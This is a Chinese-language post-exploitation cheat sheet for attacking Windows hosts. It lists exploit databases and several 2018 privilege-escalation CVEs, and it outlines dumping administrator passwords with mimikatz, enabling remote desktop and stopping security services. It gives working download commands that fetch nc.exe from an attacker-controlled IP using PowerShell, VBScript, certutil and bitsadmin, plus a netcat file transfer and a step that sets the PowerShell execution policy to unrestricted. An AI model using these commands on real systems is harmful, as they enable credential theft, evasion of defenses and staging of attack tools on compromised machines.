1. 漏洞收集 0day库
- exploit-db
- 0da’y
- https://securitytracker.com/
- https://www.rapid7.com/db/modules/
- https://cxsecurity.com/
2. cve-2018-8120、cve-2018-8897、cve-2018-8174
- 使用exploit进行提权
- 使用mimikatz抓管理员密码
- 使用命令行开启远程桌面
- 使用账号密码连接
3. 停止安全软件相关服务
4. 文件传输三十六计
4.1 windows文件传输
- 使用powershell下载
- 首先在kali 的 /var/www/html放入你的exe文件比如说nc.exe
- powershell输入如下命令
`
$p=New-Object system.net.webclient.
$p.downloadfile(“http://192.168.178.200/nc.exe","nc.exe")
- 也可以将上述命令存储在ps1文件中执行,但是默认情况下是无法执行powershell脚本的,需要在管理员权限下修改配置
powershell set-executionpolicy unrestricted
2. Visual Basic 文件下载
``` vbscript
Set args = Wscript.Arguments
Url = "http://192.168.178.200/nc.exe"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile " C:\nc.exe", 2 '
end with
cmd下执行 cscript test.vbs
由于是users组用户所以不能直接放在c盘权限不够
- nc传输
发送方cmd下执行:
nc.exe -L -p 8888 <test.vbs
接收方执行nc.exe 192.168.1.105 8888 >test.vbs
使用certutil
certutil -urlcache -split -f http://192.168.178.200/nc.exe nc.exe
使用bitsadmin
bitsadmin /transfer n http://domain/file c:\%homepath%\file
- ftp
- Windows Share File Download
tftp
ipc文件下载/上传/登陆